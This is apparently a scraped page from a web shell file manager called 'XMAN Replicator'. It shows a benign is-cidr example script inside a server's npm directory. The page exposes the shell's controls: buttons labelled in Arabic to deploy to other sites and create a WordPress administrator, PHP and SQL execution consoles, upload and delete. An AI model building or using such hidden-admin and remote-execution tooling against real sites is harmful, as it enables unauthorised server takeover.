🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
alt-nodejs9
/
root
/
usr
/
lib
/
node_modules
/
npm
/
node_modules.bundled
/
is-cidr
/
example
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:42
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:42
🔄
🗑️
🗑️📁
⬇️
🔒
example.js
408 B
-rw-r--r--
2021-09-28 11:28
✏️
🔄
🗑️
⬇️
🔒
Edit: example.js
var r = require('../lib') var v4true = r.isCidrV4('1.1.1.1/24') console.log('cidrv4 true is', v4true) var v4false = r.isCidrV4('1.1.1.256/24') console.log('cidrv4 false is', v4false) var v6true = r.isCidrV6('fe80:0000:0000:0000:0204:61ff:fe9d:f156') console.log('cidrv6 true is', v6true) var v6false = r.isCidrV6('fe80:0000:0000:0000:0204:61ff:fe9d:f156/sdfsdfs') console.log('cidrv6 false is', v6false)
Save
PHP Console
Execute
SQL Console
Execute